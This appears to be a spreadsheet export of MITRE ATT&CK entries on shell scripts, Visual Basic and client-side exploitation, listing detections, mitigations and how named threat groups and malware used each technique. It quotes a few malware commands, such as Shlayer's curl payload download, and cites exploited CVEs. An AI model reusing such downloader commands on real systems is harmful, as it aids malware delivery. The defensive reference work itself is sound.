[OSX/Shlayer](https://attack.mitre.org/software/S0402) can use bash scripts to check the macOS version, download payloads, and extract bytes from files. [OSX/Shlayer](https://attack.mitre.org/software/S0402) uses the command &lt;code&gt;sh -c tail -c +1381...&lt;/code&gt; to extract bytes at an offset from a specified file. [OSX/Shlayer](https://attack.mitre.org/software/S0402) uses the &lt;code&gt;curl -fsL "$url" &gt;$tmp_path&lt;/code&gt; command to download malicious payloads into a temporary directory.(Citation: Carbon Black Shlayer Feb 2019)(Citation: sentinelone shlayer to zshlayer)(Citation: 20 macOS Common Tools and Techniques)(Citation: objectivesee osx.shlayer apple approved 2020)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses a shell script as the main executable inside an app bundle and drops an embedded base64-encoded payload to the &lt;code&gt;/tmp&lt;/code&gt; folder.(Citation: Trend Micro MacOS Backdoor November 2020)(Citation: sentinelone apt32 macOS backdoor 2020)
Penquin
[Penquin](https://attack.mitre.org/software/S0587) can execute remote commands using bash scripts.(Citation: Leonardo Turla Penquin May 2020)
Proton
[Proton](https://attack.mitre.org/software/S0279) uses macOS' .command file type to script actions.(Citation: objsee mac malware 2017)
Skidmap
[Skidmap](https://attack.mitre.org/software/S0468) has used &lt;code&gt;pm.sh&lt;/code&gt; to download and install its main payload.(Citation: Trend Micro Skidmap)
Turian
[Turian](https://attack.mitre.org/software/S0647) has the ability to use &lt;code&gt;/bin/sh&lt;/code&gt; to execute commands.(Citation: ESET BackdoorDiplomacy Jun 2021)
WindTail
[WindTail](https://attack.mitre.org/software/S0466) can use the &lt;code&gt;open&lt;/code&gt; command to execute an application.(Citation: objective-see windtail1 dec 2018)
XCSSET
[XCSSET](https://attack.mitre.org/software/S0658) uses a shell script to execute Mach-o files and &lt;code&gt;osacompile&lt;/code&gt; commands such as, &lt;code&gt;osacompile -x -o xcode.app main.applescript&lt;/code&gt;.(Citation: trendmicro xcsset xcode project 2020)
</t>
  </si>
  <si>
    <t xml:space="preserve">Command Execution
Monitor executed commands and arguments that may abuse Visual Basic (VB) for execution.
Module Load
Monitor for the loading of modules associated with VB languages (ex: vbscript.dll).
Note: For Windows, Sysmon Event ID 7 (Image loaded) can be used to alert on the loading of DLL modules (e.g., vbscript.dll) associated with Visual Basic into processes. Due to the high frequency of image load operations, Event ID 7 can generate a large volume of events. Therefore, we recommend tuning the Sysmon configuration file to exclude common, benign image loads that may result in false positives. 
Process Creation
Monitor for events associated with VB execution, such as Office applications spawning processes, usage of the Windows Script Host (typically cscript.exe or wscript.exe). VB execution is likely to perform actions with various effects on a system that may generate events, depending on the types of monitoring used.
Script Execution
Monitor for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Antivirus/Antimalware
Anti-virus can be used to automatically quarantine suspicious files. 
Behavior Prevention on Endpoint
On Windows 10, enable Attack Surface Reduction (ASR) rules to prevent [Visual Basic](https://attack.mitre.org/techniques/T1059/005) scripts from executing potentially malicious downloaded content (Citation: win10_asr).
Disable or Remove Feature or Program
Turn off or restrict access to unneeded VB components.
Execution Prevention
Use application control where appropriate. VBA macros obtained from the Internet, based on the file's Mark of the Web (MOTW) attribute, may be blocked from executing in Office applications (ex: Access, Excel, PowerPoint, Visio, and Word) by default starting in Windows Version 2203.(Citation: Default VBS macros Blocking )
Restrict Web-Based Content
Script blocking extensions can help prevent the execution of scripts and HTA files that may commonly be used during the exploitation process. For malicious code served up through ads, adblockers can help prevent that code from executing in the first place.
2015 Ukraine Electric Power Attack
During the [2015 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0028), [Sandworm Team](https://attack.mitre.org/groups/G0034) installed a VBA script called `vba_macro.exe`. This macro dropped `FONTCACHE.DAT`, the primary [BlackEnergy](https://attack.mitre.org/software/S0089) implant; `rundll32.exe`, for executing the malware; `NTUSER.log`, an empty file; and desktop.ini, the default file used to determine folder displays on Windows machines. (Citation: Booz Allen Hamilton)
2016 Ukraine Electric Power Attack
During the [2016 Ukraine Electric Power Attack](https://attack.mitre.org/campaigns/C0025), [Sandworm Team](https://attack.mitre.org/groups/G0034) created VBScripts to run on an SSH server.(Citation: Dragos Crashoverride 2018)
C0011
For [C0011](https://attack.mitre.org/campaigns/C0011), [Transparent Tribe](https://attack.mitre.org/groups/G0134) used malicious VBA macros within a lure document as part of the [Crimson](https://attack.mitre.org/software/S0115) malware installation process onto a compromised host.(Citation: Cisco Talos Transparent Tribe Education Campaign July 2022)
C0015
During [C0015](https://attack.mitre.org/campaigns/C0015), the threat actors used a malicious HTA file that contained a mix of HTML and JavaScript/VBScript code.(Citation: DFIR Conti Bazar Nov 2021)
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors used Word documents that prompted the victim to enable macros and run a Visual Basic script.(Citation: Talos Frankenstein June 2019)
FunnyDream
During [FunnyDream](https://attack.mitre.org/campaigns/C0007), the threat actors used a Visual Basic script to run remote commands.(Citation: Bitdefender FunnyDream Campaign November 2020)
Operation CuckooBees
During [Operation CuckooBees](https://attack.mitre.org/campaigns/C0012), the threat actors executed an encoded VBScript file using `wscript` and wrote the decoded output to a text file.(Citation: Cybereason OperationCuckooBees May 2022)
Operation Dream Job
During [Operation Dream Job](https://attack.mitre.org/campaigns/C0022), [Lazarus Group](https://attack.mitre.org/groups/G0032) executed a VBA written malicious macro after victims download malicious DOTM files; [Lazarus Group](https://attack.mitre.org/groups/G0032) also used Visual Basic macro code to extract a double Base64 encoded DLL implant.(Citation: ClearSky Lazarus Aug 2020)(Citation: McAfee Lazarus Jul 2020)
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors used Visual Basic scripts.(Citation: Cylance Dust Storm)
Operation Honeybee
For [Operation Honeybee](https://attack.mitre.org/campaigns/C0006), the threat actors used a Visual Basic script embedded within a Word document to download an implant.(Citation: McAfee Honeybee) 
Operation Sharpshooter
During [Operation Sharpshooter](https://attack.mitre.org/campaigns/C0013), the threat actors used a VBA macro to execute a simple downloader that installed [Rising Sun](https://attack.mitre.org/software/S0448).(Citation: McAfee Sharpshooter December 2018)
Operation Wocao
During [Operation Wocao](https://attack.mitre.org/campaigns/C0014), threat actors used VBScript to conduct reconnaissance on targeted systems.(Citation: FoxIT Wocao December 2019)
SolarWinds Compromise
For the [SolarWinds Compromise](https://attack.mitre.org/campaigns/C0024), [APT29](https://attack.mitre.org/groups/G0016) wrote malware such as [Sibot](https://attack.mitre.org/software/S0589) in Visual Basic.(Citation: Cybersecurity Advisory SVR TTP May 2021)
APT-C-36
[APT-C-36](https://attack.mitre.org/groups/G0099) has embedded a VBScript within a malicious Word document which is executed upon the document opening.(Citation: QiAnXin APT-C-36 Feb2019)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used macros, COM scriptlets, and VBS scripts.(Citation: Cybereason Oceanlotus May 2017)(Citation: Cybereason Cobalt Kitty 2017) 
APT33
[APT33](https://attack.mitre.org/groups/G0064) has used VBScript to initiate the delivery of payloads.(Citation: Microsoft Holmium June 2020)
APT37
[APT37](https://attack.mitre.org/groups/G0067) executes shellcode and a VBA script to decode Base64 strings.(Citation: Talos Group123)
APT38
[APT38](https://attack.mitre.org/groups/G0082) has used VBScript to execute commands and other operational tasks.(Citation: CISA AA20-239A BeagleBoyz August 2020)
APT39
[APT39](https://attack.mitre.org/groups/G0087) has utilized malicious VBS scripts in malware.(Citation: FBI FLASH APT39 September 2020)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has used VBS and VBE scripts for execution.(Citation: Secureworks BRONZE BUTLER Oct 2017)(Citation: Trend Micro Tick November 2019)
Cobalt Group
[Cobalt Group](https://attack.mitre.org/groups/G0080) has sent Word OLE compound documents with malicious obfuscated VBA macros that will run upon user execution.(Citation: Talos Cobalt Group July 2018)(Citation: PTSecurity Cobalt Group Aug 2017)(Citation: Group IB Cobalt Aug 2017)(Citation: Morphisec Cobalt Gang Oct 2018)(Citation: Unit 42 Cobalt Gang Oct 2018)(Citation: TrendMicro Cobalt Group Nov 2017)
Confucius
[Confucius](https://attack.mitre.org/groups/G0142) has used VBScript to execute malicious code.(Citation: TrendMicro Confucius APT Feb 2018)
Earth Lusca
[Earth Lusca](https://attack.mitre.org/groups/G1006) used VBA scripts.(Citation: TrendMicro EarthLusca 2022)
FIN13
[FIN13](https://attack.mitre.org/groups/G1016) has used VBS scripts for code execution on comrpomised machines.(Citation: Sygnia Elephant Beetle Jan 2022)
FIN4
[FIN4](https://attack.mitre.org/groups/G0085) has used VBA macros to display a dialog box and collect victim credentials.(Citation: FireEye Hacking FIN4 Dec 2014)(Citation: FireEye Hacking FIN4 Video Dec 2014)
FIN7
[FIN7](https://attack.mitre.org/groups/G0046) used VBS scripts to help perform tasks on the victim's machine.(Citation: FireEye FIN7 Aug 2018)(Citation: Flashpoint FIN 7 March 2019)(Citation: CrowdStrike Carbon Spider August 2021)
Gamaredon Group
[Gamaredon Group](https://attack.mitre.org/groups/G0047) has embedded malicious macros in document templates, which executed VBScript. [Gamaredon Group](https://attack.mitre.org/groups/G0047) has also delivered Microsoft Outlook VBA projects with embedded macros.(Citation: TrendMicro Gamaredon April 2020)(Citation: ESET Gamaredon June 2020)(Citation: CERT-EE Gamaredon January 2021)(Citation: Microsoft Actinium February 2022)(Citation: Secureworks IRON TILDEN Profile)
Gorgon Group
[Gorgon Group](https://attack.mitre.org/groups/G0078) has used macros in [Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001)s as well as executed VBScripts on victim machines.(Citation: Unit 42 Gorgon Group Aug 2018)
HEXANE
[HEXANE](https://attack.mitre.org/groups/G1001) has used a VisualBasic script named `MicrosoftUpdator.vbs` for execution of a PowerShell keylogger.(Citation: Kaspersky Lyceum October 2021)
Higaisa
[Higaisa](https://attack.mitre.org/groups/G0126) has used VBScript code on the victim's machine.(Citation: PTSecurity Higaisa 2020)
Inception
[Inception](https://attack.mitre.org/groups/G0100) has used VBScript to execute malicious commands and payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas December 2014)
Kimsuky
[Kimsuky](https://attack.mitre.org/groups/G0094) has used Visual Basic to download malicious payloads.(Citation: ThreatConnect Kimsuky September 2020)(Citation: VirusBulletin Kimsuky October 2019)(Citation: Crowdstrike GTR2020 Mar 2020)(Citation: Talos Kimsuky Nov 2021) [Kimsuky](https://attack.mitre.org/groups/G0094) has also used malicious VBA macros within maldocs disguised as forms that trigger when a victim types any content into the lure.(Citation: Talos Kimsuky Nov 2021)
Lazarus Group
[Lazarus Group](https://attack.mitre.org/groups/G0032) has used VBA and embedded macros in Word documents to execute malicious code.(Citation: Lazarus APT January 2022)(Citation: Qualys LolZarus)
LazyScripter
[LazyScripter](https://attack.mitre.org/groups/G0140) has used VBScript to execute malicious code.(Citation: MalwareBytes LazyScripter Feb 2021)
Leviathan
[Leviathan](https://attack.mitre.org/groups/G0065) has used VBScript.(Citation: Proofpoint Leviathan Oct 2017)
Machete
[Machete](https://attack.mitre.org/groups/G0095) has embedded malicious macros within spearphishing attachments to download additional files.(Citation: 360 Machete Sep 2020)
Magic Hound
[Magic Hound](https://attack.mitre.org/groups/G0059) malware has used VBS scripts for execution.(Citation: Unit 42 Magic Hound Feb 2017)
Molerats
[Molerats](https://attack.mitre.org/groups/G0021) used various implants, including those built with VBScript, on target machines.(Citation: Kaspersky MoleRATs April 2019)(Citation: Unit42 Molerat Mar 2020)
MuddyWater
[MuddyWater](https://attack.mitre.org/groups/G0069) has used VBScript files to execute its [POWERSTATS](https://attack.mitre.org/software/S0223) payload, as well as macros.(Citation: FireEye MuddyWater Mar 2018)(Citation: MuddyWater TrendMicro June 2018)(Citation: Securelist MuddyWater Oct 2018)(Citation: Symantec MuddyWater Dec 2018)(Citation: ClearSky MuddyWater Nov 2018)(Citation: ClearSky MuddyWater June 2019)(Citation: Reaqta MuddyWater November 2017)(Citation: Trend Micro Muddy Water March 2021)(Citation: Talos MuddyWater Jan 2022)
Mustang Panda
[Mustang Panda](https://attack.mitre.org/groups/G0129) has embedded VBScript components in LNK files to download additional files and automate collection.(Citation: Crowdstrike MUSTANG PANDA June 2018)(Citation: Anomali MUSTANG PANDA October 2019)(Citation: Secureworks BRONZE PRESIDENT December 2019)
OilRig
[OilRig](https://attack.mitre.org/groups/G0049) has used VBSscipt macros for execution on compromised hosts.(Citation: Check Point APT34 April 2021)
Patchwork
[Patchwork](https://attack.mitre.org/groups/G0040) used Visual Basic Scripts (VBS) on victim machines.(Citation: TrendMicro Patchwork Dec 2017)(Citation: Volexity Patchwork June 2018)
Rancor
[Rancor](https://attack.mitre.org/groups/G0075) has used VBS scripts as well as embedded macros for execution.(Citation: Rancor Unit42 June 2018)
Sandworm Team
[Sandworm Team](https://attack.mitre.org/groups/G0034) has created VBScripts to run an SSH server.(Citation: ESET BlackEnergy Jan 2016)(Citation: ESET Telebots Dec 2016)(Citation: ESET Telebots June 2017)(Citation: Dragos Crashoverride 2018) 
SideCopy
[SideCopy](https://attack.mitre.org/groups/G1008) has sent Microsoft Office Publisher documents to victims that have embedded malicious macros that execute an hta file via calling `mshta.exe`.(Citation: MalwareBytes SideCopy Dec 2021)
Sidewinder
[Sidewinder](https://attack.mitre.org/groups/G0121) has used VBScript to drop and execute malware loaders.(Citation: ATT Sidewinder January 2021)
Silence
[Silence](https://attack.mitre.org/groups/G0091) has used VBS scripts.(Citation: Cyber Forensicator Silence Jan 2019)
TA2541
[TA2541](https://attack.mitre.org/groups/G1018) has used VBS files to execute or establish persistence for additional payloads, often using file names consistent with email themes or mimicking system functionality.(Citation: Proofpoint TA2541 February 2022)(Citation: Cisco Operation Layover September 2021)
TA459
[TA459](https://attack.mitre.org/groups/G0062) has a VBScript for execution.(Citation: Proofpoint TA459 April 2017)
TA505
[TA505](https://attack.mitre.org/groups/G0092) has used VBS for code execution.(Citation: Proofpoint TA505 Sep 2017)(Citation: Proofpoint TA505 June 2018)(Citation: Trend Micro TA505 June 2019)(Citation: IBM TA505 April 2020)
Transparent Tribe
[Transparent Tribe](https://attack.mitre.org/groups/G0134) has crafted VBS-based malicious documents.(Citation: Proofpoint Operation Transparent Tribe March 2016)(Citation: Kaspersky Transparent Tribe August 2020)	 
Turla
[Turla](https://attack.mitre.org/groups/G0010) has used VBS scripts throughout its operations.(Citation: Symantec Waterbug Jun 2019)	
WIRTE
[WIRTE](https://attack.mitre.org/groups/G0090) has used VBScript  in its operations.(Citation: Lab52 WIRTE Apr 2019)	
Windshift
[Windshift](https://attack.mitre.org/groups/G0112) has used Visual Basic 6 (VB6) payloads.(Citation: BlackBerry Bahamut)
Astaroth
[Astaroth](https://attack.mitre.org/software/S0373) has used malicious VBS e-mail attachments for execution.(Citation: Securelist Brazilian Banking Malware July 2020)
BackConfig
[BackConfig](https://attack.mitre.org/software/S0475) has used VBS to install its downloader component and malicious documents with VBA macro code.(Citation: Unit 42 BackConfig May 2020)
Bandook
[Bandook](https://attack.mitre.org/software/S0234) has used malicious VBA code against the target system.(Citation: CheckPoint Bandook Nov 2020)
Bisonal
[Bisonal](https://attack.mitre.org/software/S0268)'s dropper creates VBS scripts on the victim’s machine.(Citation: Unit 42 Bisonal July 2018)(Citation: Talos Bisonal Mar 2020) 
Bumblebee
[Bumblebee](https://attack.mitre.org/software/S1039) can create a Visual Basic script to enable persistence.(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)
Chaes
[Chaes](https://attack.mitre.org/software/S0631) has used VBscript to execute malicious code.(Citation: Cybereason Chaes Nov 2020) 
Cobalt Strike
[Cobalt Strike](https://attack.mitre.org/software/S0154) can use VBA to perform execution.(Citation: Cobalt Strike TTPs Dec 2017)(Citation: CobaltStrike Daddy May 2017)(Citation: Talos Cobalt Strike September 2020)
Comnie
[Comnie](https://attack.mitre.org/software/S0244) executes VBS scripts.(Citation: Palo Alto Comnie)
DanBot
[DanBot](https://attack.mitre.org/software/S1014) can use a VBA macro embedded in an Excel file to drop the payload.(Citation: SecureWorks August 2019)
Donut
[Donut](https://attack.mitre.org/software/S0695) can generate shellcode outputs that execute via VBScript.(Citation: Donut Github)	
Emotet
[Emotet](https://attack.mitre.org/software/S0367) has sent Microsoft Word documents with embedded macros that will invoke scripts to download additional payloads. (Citation: Symantec Emotet Jul 2018)(Citation: Talos Emotet Jan 2019)(Citation: Trend Micro Emotet Jan 2019)(Citation: Picus Emotet Dec 2018)(Citation: Carbon Black Emotet Apr 2019)
Exaramel for Windows
[Exaramel for Windows](https://attack.mitre.org/software/S0343) has a command to execute VBS scripts on the victim’s machine.(Citation: ESET TeleBots Oct 2018)
Ferocious
[Ferocious](https://attack.mitre.org/software/S0679) has the ability to use Visual Basic scripts for execution.(Citation: Kaspersky WIRTE November 2021)
Flagpro
[Flagpro](https://attack.mitre.org/software/S0696) can execute malicious VBA macros embedded in .xlsm files.(Citation: NTT Security Flagpro new December 2021)
Goopy
[Goopy](https://attack.mitre.org/software/S0477) has the ability to use a Microsoft Outlook backdoor macro to communicate with its C2.(Citation: Cybereason Cobalt Kitty 2017)	
Grandoreiro
[Grandoreiro](https://attack.mitre.org/software/S0531) can use VBScript to execute malicious code.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)
Helminth
One version of [Helminth](https://attack.mitre.org/software/S0170) consists of VBScript scripts.(Citation: Palo Alto OilRig May 2016)
IcedID
[IcedID](https://attack.mitre.org/software/S0483) has used obfuscated VBA string expressions.(Citation: Juniper IcedID June 2020)
JCry
[JCry](https://attack.mitre.org/software/S0389) has used VBS scripts. (Citation: Carbon Black JCry May 2019)
JSS Loader
[JSS Loader](https://attack.mitre.org/software/S0648) can download and execute VBScript files.(Citation: CrowdStrike Carbon Spider August 2021)
Javali
[Javali](https://attack.mitre.org/software/S0528) has used embedded VBScript to download malicious payloads from C2.(Citation: Securelist Brazilian Banking Malware July 2020)
KOCTOPUS
[KOCTOPUS](https://attack.mitre.org/software/S0669) has used VBScript to call wscript to execute a PowerShell command.(Citation: MalwareBytes LazyScripter Feb 2021)
Kerrdown
[Kerrdown](https://attack.mitre.org/software/S0585) can use a VBS base64 decoder function published by Motobit.(Citation: Unit 42 KerrDown February 2019)
KeyBoy
[KeyBoy](https://attack.mitre.org/software/S0387) uses VBS scripts for installing files and performing execution.(Citation: CitizenLab KeyBoy Nov 2016)
Koadic
[Koadic](https://attack.mitre.org/software/S0250) performs most of its operations using Windows Script Host (VBScript) and runs arbitrary shellcode .(Citation: Github Koadic)
Lokibot
[Lokibot](https://attack.mitre.org/software/S0447) has used VBS scripts and XLS macros for execution.(Citation: Talos Lokibot Jan 2021) 
LookBack
[LookBack](https://attack.mitre.org/software/S0582) has used VBA macros in Microsoft Word attachments to drop additional files to the host.(Citation: Proofpoint LookBack Malware Aug 2019)
Melcoz
[Melcoz](https://attack.mitre.org/software/S0530) can use VBS scripts to execute malicious DLLs.(Citation: Securelist Brazilian Banking Malware July 2020)
Metamorfo
[Metamorfo](https://attack.mitre.org/software/S0455) has used VBS code on victims’ systems.(Citation: FireEye Metamorfo Apr 2018)
NETWIRE
[NETWIRE](https://attack.mitre.org/software/S0198) has been executed through use of VBScripts.(Citation: FireEye NETWIRE March 2019)(Citation: Proofpoint NETWIRE December 2020)
NanHaiShu
[NanHaiShu](https://attack.mitre.org/software/S0228) executes additional VBScript code on the victim's machine.(Citation: fsecure NanHaiShu July 2016)
NanoCore
[NanoCore](https://attack.mitre.org/software/S0336) uses VBS files.(Citation: Cofense NanoCore Mar 2018)
OSX_OCEANLOTUS.D
[OSX_OCEANLOTUS.D](https://attack.mitre.org/software/S0352) uses Word macros for execution.(Citation: TrendMicro MacOS April 2018)
OopsIE
[OopsIE](https://attack.mitre.org/software/S0264) creates and uses a VBScript as part of its persistent execution.(Citation: Unit 42 OopsIE! Feb 2018)(Citation: Unit 42 OilRig Sept 2018)
POWERSTATS
[POWERSTATS](https://attack.mitre.org/software/S0223) can use VBScript (VBE) code for execution.(Citation: ClearSky MuddyWater Nov 2018)(Citation: TrendMicro POWERSTATS V3 June 2019)
PoetRAT
[PoetRAT](https://attack.mitre.org/software/S0428) has used Word documents with VBScripts to execute malicious activities.(Citation: Talos PoetRAT April 2020)(Citation: Talos PoetRAT October 2020)
PowerShower
[PowerShower](https://attack.mitre.org/software/S0441) has the ability to save and execute VBScript.(Citation: Unit 42 Inception November 2018)
Pteranodon
[Pteranodon](https://attack.mitre.org/software/S0147) can use a malicious VBS file for execution.(Citation: Symantec Shuckworm January 2022)
QUADAGENT
[QUADAGENT](https://attack.mitre.org/software/S0269) uses VBScripts.(Citation: Unit 42 QUADAGENT July 2018)
QakBot
[QakBot](https://attack.mitre.org/software/S0650) can use VBS to download and execute malicious files.(Citation: Trend Micro Qakbot May 2020)
(Citation: Kroll Qakbot June 2020)(Citation: Crowdstrike Qakbot October 2020)(Citation: Trend Micro Qakbot December 2020)(Citation: Cyberint Qakbot May 2021)(Citation: Group IB Ransomware September 2020)(Citation: Trend Micro Black Basta October 2022)
REvil
[REvil](https://attack.mitre.org/software/S0496) has used obfuscated VBA macros for execution.(Citation: G Data Sodinokibi June 2019)(Citation: Picus Sodinokibi January 2020)
ROKRAT
[ROKRAT](https://attack.mitre.org/software/S0240) has used Visual Basic for execution.(Citation: Malwarebytes RokRAT VBA January 2021)
Ramsay
[Ramsay](https://attack.mitre.org/software/S0458) has included embedded Visual Basic scripts in malicious documents.(Citation: Eset Ramsay May 2020)(Citation: Antiy CERT Ramsay April 2020)	
Remexi
[Remexi](https://attack.mitre.org/software/S0375) uses AutoIt and VBS scripts throughout its execution process.(Citation: Securelist Remexi Jan 2019)
STARWHALE
[STARWHALE](https://attack.mitre.org/software/S1037) can use the VBScript function `GetRef` as part of its persistence mechanism.(Citation: Mandiant UNC3313 Feb 2022)
SUNBURST
[SUNBURST](https://attack.mitre.org/software/S0559) used VBScripts to initiate the execution of payloads.(Citation: Microsoft Deep Dive Solorigate January 2021)
SVCReady
[SVCReady](https://attack.mitre.org/software/S1064) has used VBA macros to execute shellcode.(Citation: HP SVCReady Jun 2022)
Saint Bot
[Saint Bot](https://attack.mitre.org/software/S1018) has used `.vbs` scripts for execution.(Citation: Palo Alto Unit 42 OutSteel SaintBot February 2022 )
Sibot
[Sibot](https://attack.mitre.org/software/S0589) executes commands using VBScript.(Citation: MSTIC NOBELIUM Mar 2021)	
Smoke Loader
[Smoke Loader](https://attack.mitre.org/software/S0226) adds a Visual Basic script in the Startup folder to deploy the payload.(Citation: Malwarebytes SmokeLoader 2016)
Snip3
[Snip3](https://attack.mitre.org/software/S1086) can use visual basic scripts for first-stage execution.(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)
Squirrelwaffle
[Squirrelwaffle](https://attack.mitre.org/software/S1030) has used malicious VBA macros in Microsoft Word documents and Excel spreadsheets that execute an `AutoOpen` subroutine.(Citation: ZScaler Squirrelwaffle Sep 2021)(Citation: Netskope Squirrelwaffle Oct 2021) 
StoneDrill
[StoneDrill](https://attack.mitre.org/software/S0380) has several VBS scripts used throughout the malware's lifecycle.(Citation: Kaspersky StoneDrill 2017)	
TYPEFRAME
[TYPEFRAME](https://attack.mitre.org/software/S0263) has used a malicious Word document for delivery with VBA macros for execution.(Citation: US-CERT TYPEFRAME June 2018)
Ursnif
[Ursnif](https://attack.mitre.org/software/S0386) droppers have used VBA macros to download and execute the malware's full executable payload.(Citation: Bromium Ursnif Mar 2017)
VBShower
[VBShower](https://attack.mitre.org/software/S0442) has the ability to execute VBScript files.(Citation: Kaspersky Cloud Atlas August 2019)
WhisperGate
[WhisperGate](https://attack.mitre.org/software/S0689) can use a Visual Basic script to exclude the `C:\` drive from Windows Defender.(Citation: Unit 42 WhisperGate January 2022)(Citation: Cisco Ukraine Wipers January 2022)
Xbash
[Xbash](https://attack.mitre.org/software/S0341) can execute malicious VBScript payloads on the victim’s machine.(Citation: Unit42 Xbash Sept 2018)
jRAT
[jRAT](https://attack.mitre.org/software/S0283) has been distributed as HTA files with VBScript.(Citation: Kaspersky Adwind Feb 2016)	
</t>
  </si>
  <si>
    <t xml:space="preserve">Application Log Content
Detecting software exploitation may be difficult depending on the tools available. Software exploits may not always succeed or may cause the exploited process to become unstable or crash.
Process Creation
Monitor for abnormal process creations, such as a Command and Scripting Interpreter spawning from a potentially exploited application. Also look for other behavior on the endpoint system that might indicate successful compromise, such as abnormal behavior of browser or Office processes.
Application Isolation and Sandboxing
Browser sandboxes can be used to mitigate some of the impact of exploitation, but sandbox escapes may still exist. (Citation: Windows Blogs Microsoft Edge Sandbox) (Citation: Ars Technica Pwn2Own 2017 VM Escape)
Other types of virtualization and application microsegmentation may also mitigate the impact of client-side exploitation. Risks of additional exploits and weaknesses in those systems may still exist. (Citation: Ars Technica Pwn2Own 2017 VM Escape)
Exploit Protection
Security applications that look for behavior used during exploitation such as Windows Defender Exploit Guard (WDEG) and the Enhanced Mitigation Experience Toolkit (EMET) can be used to mitigate some exploitation behavior. (Citation: TechNet Moving Beyond EMET) Control flow integrity checking is another way to potentially identify and stop a software exploit from occurring. (Citation: Wikipedia Control Flow Integrity) Many of these protections depend on the architecture and target application binary for compatibility.
Frankenstein
During [Frankenstein](https://attack.mitre.org/campaigns/C0001), the threat actors exploited CVE-2017-11882 to execute code on the victim's machine.(Citation: Talos Frankenstein June 2019)
Operation Dust Storm
During [Operation Dust Storm](https://attack.mitre.org/campaigns/C0016), the threat actors exploited Adobe Flash vulnerability CVE-2011-0611, Microsoft Windows Help vulnerability CVE-2010-1885, and several Internet Explorer vulnerabilities, including CVE-2011-1255, CVE-2012-1889, and CVE-2014-0322.(Citation: Cylance Dust Storm)
APT12
[APT12](https://attack.mitre.org/groups/G0005) has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities (CVE-2009-3129, CVE-2012-0158) and vulnerabilities in Adobe Reader and Flash (CVE-2009-4324, CVE-2009-0927, CVE-2011-0609, CVE-2011-0611).(Citation: Moran 2014)(Citation: Trend Micro IXESHE 2012)
APT28
[APT28](https://attack.mitre.org/groups/G0007) has exploited Microsoft Office vulnerability CVE-2017-0262 for execution.(Citation: Securelist Sofacy Feb 2018)
APT29
[APT29](https://attack.mitre.org/groups/G0016) has used multiple software exploits for common client software, like Microsoft Word, Exchange, and Adobe Reader, to gain code execution.(Citation: F-Secure The Dukes)(Citation: Cybersecurity Advisory SVR TTP May 2021)(Citation: MSTIC NOBELIUM May 2021)
APT3
[APT3](https://attack.mitre.org/groups/G0022) has exploited the Adobe Flash Player vulnerability CVE-2015-3113 and Internet Explorer vulnerability CVE-2014-1776.(Citation: FireEye Clandestine Wolf)(Citation: FireEye Clandestine Fox)
APT32
[APT32](https://attack.mitre.org/groups/G0050) has used RTF document that includes an exploit to execute malicious code. (CVE-2017-11882)(Citation: ESET OceanLotus Mar 2019)
APT33
[APT33](https://attack.mitre.org/groups/G0064) has attempted to exploit a known vulnerability in WinRAR (CVE-2018-20250), and attempted to gain remote code execution via a security bypass vulnerability (CVE-2017-11774).(Citation: Symantec Elfin Mar 2019)(Citation: Microsoft Holmium June 2020)
APT37
[APT37](https://attack.mitre.org/groups/G0067) has used exploits for Flash Player (CVE-2016-4117, CVE-2018-4878), Word (CVE-2017-0199), Internet Explorer (CVE-2020-1380 and CVE-2020-26411), and Microsoft Edge (CVE-2021-26411) for execution.(Citation: Securelist ScarCruft Jun 2016)(Citation: FireEye APT37 Feb 2018)(Citation: Talos Group123)(Citation: Volexity InkySquid BLUELIGHT August 2021)
APT41
[APT41](https://attack.mitre.org/groups/G0096) leveraged the follow exploits in their operations: CVE-2012-0158, CVE-2015-1641, CVE-2017-0199, CVE-2017-11882, and CVE-2019-3396.(Citation: FireEye APT41 Aug 2019) 
Andariel
[Andariel](https://attack.mitre.org/groups/G0138) has exploited numerous ActiveX vulnerabilities, including zero-days.(Citation: FSI Andariel Campaign Rifle July 2017)(Citation: IssueMakersLab Andariel GoldenAxe May 2017)(Citation: TrendMicro New Andariel Tactics July 2018)
Aoqin Dragon
[Aoqin Dragon](https://attack.mitre.org/groups/G1007) has exploited CVE-2012-0158 and CVE-2010-3333 for execution against targeted systems.(Citation: SentinelOne Aoqin Dragon June 2022)
Axiom
[Axiom](https://attack.mitre.org/groups/G0001) has used exploits for multiple vulnerabilities including CVE-2014-0322, CVE-2012-4792, CVE-2012-1889, and CVE-2013-3893.(Citation: Cisco Group 72)
BITTER
[BITTER](https://attack.mitre.org/groups/G1002) has exploited Microsoft Office vulnerabilities CVE-2012-0158, CVE-2017-11882, CVE-2018-0798, and CVE-2018-0802.(Citation: Cisco Talos Bitter Bangladesh May 2022)(Citation: Forcepoint BITTER Pakistan Oct 2016)
BRONZE BUTLER
[BRONZE BUTLER](https://attack.mitre.org/groups/G0060) has exploited Microsoft Office vulnerabilities CVE-2014-4114, CVE-2018-0802, and CVE-2018-0798 for execution.(Citation: Symantec Tick Apr 2016)(Citation: Trend Micro Tick November 2019)
BlackTech
[BlackTech](https://attack.mitre.org/groups/G0098) has exploited multiple vulnerabilities for execution, including Microsoft Office vulnerabilities CVE-2012-0158, CVE-2014-6352, CVE-2017-0199, and Adobe Flash CVE-2015-5119.(Citation: TrendMicro BlackTech June 2017)
Cobalt Group
